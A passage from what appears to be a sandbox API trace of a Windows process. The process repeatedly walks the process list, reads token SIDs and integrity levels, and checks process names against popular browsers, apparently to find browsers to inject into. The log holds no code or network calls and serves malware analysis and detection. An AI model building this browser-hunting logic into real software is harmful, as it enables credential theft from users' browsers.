(hObject=0x298) returned 1 [0530.861] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0530.861] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0530.861] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0530.861] GetLastError () returned 0x7a [0530.861] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0530.861] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0530.861] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0530.861] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0530.861] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0530.861] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0530.861] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0530.861] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0530.861] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0530.862] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0530.862] GetLastError () returned 0x7a [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0530.862] CloseHandle (hObject=0x29c) returned 1 [0530.862] CloseHandle (hObject=0x298) returned 1 [0530.862] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0530.862] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0530.862] GetLastError () returned 0x7a [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0530.862] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0530.862] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0530.862] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0530.862] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0530.862] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0530.862] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0530.862] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0530.862] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0530.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0530.862] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0530.862] GetLastError () returned 0x7a [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0530.862] CloseHandle (hObject=0x29c) returned 1 [0530.862] CloseHandle (hObject=0x298) returned 1 [0530.862] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0530.862] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0530.862] GetLastError () returned 0x7a [0530.862] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0530.862] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0530.862] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0530.862] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0530.862] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0530.862] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0530.863] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0530.863] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0530.863] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0530.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0530.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0530.863] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0530.863] GetLastError () returned 0x7a [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0530.863] CloseHandle (hObject=0x29c) returned 1 [0530.863] CloseHandle (hObject=0x298) returned 1 [0530.863] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0530.863] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0530.863] GetLastError () returned 0x7a [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0530.863] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0530.863] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0530.863] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0530.863] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0530.863] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0530.863] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0530.863] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0530.863] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0530.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0530.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0530.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0530.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0530.863] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0530.863] GetLastError () returned 0x7a [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0530.863] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0530.863] CloseHandle (hObject=0x29c) returned 1 [0530.863] CloseHandle (hObject=0x298) returned 1 [0530.863] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0530.863] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0530.864] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0530.864] GetLastError () returned 0x7a [0530.864] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0530.864] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0530.864] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0530.864] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0530.864] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0530.864] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0530.864] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0530.864] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0530.864] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0530.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0530.864] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0530.864] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0532.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa840) returned 0xc0000004 [0532.886] VirtualAlloc (lpAddress=0x0, dwSize=0xb840, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0532.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb840, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0532.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0532.888] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0532.888] GetLastError () returned 0x7a [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0532.888] CloseHandle (hObject=0x29c) returned 1 [0532.888] CloseHandle (hObject=0x298) returned 1 [0532.888] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0532.888] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0532.888] GetLastError () returned 0x7a [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0532.888] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0532.888] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0532.888] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0532.888] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0532.888] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0532.888] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0532.888] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0532.888] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0532.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0532.888] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0532.888] GetLastError () returned 0x7a [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0532.888] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0532.888] CloseHandle (hObject=0x29c) returned 1 [0532.888] CloseHandle (hObject=0x298) returned 1 [0532.888] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0532.889] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0532.889] GetLastError () returned 0x7a [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0532.889] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0532.889] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0532.889] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0532.889] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0532.889] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0532.889] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0532.889] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0532.889] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0532.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0532.889] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0532.889] GetLastError () returned 0x7a [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0532.889] CloseHandle (hObject=0x29c) returned 1 [0532.889] CloseHandle (hObject=0x298) returned 1 [0532.889] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0532.889] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0532.889] GetLastError () returned 0x7a [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0532.889] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0532.889] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0532.889] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0532.889] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0532.889] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0532.889] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0532.889] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0532.889] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0532.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0532.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0532.889] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0532.889] GetLastError () returned 0x7a [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0532.889] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0532.889] CloseHandle (hObject=0x29c) 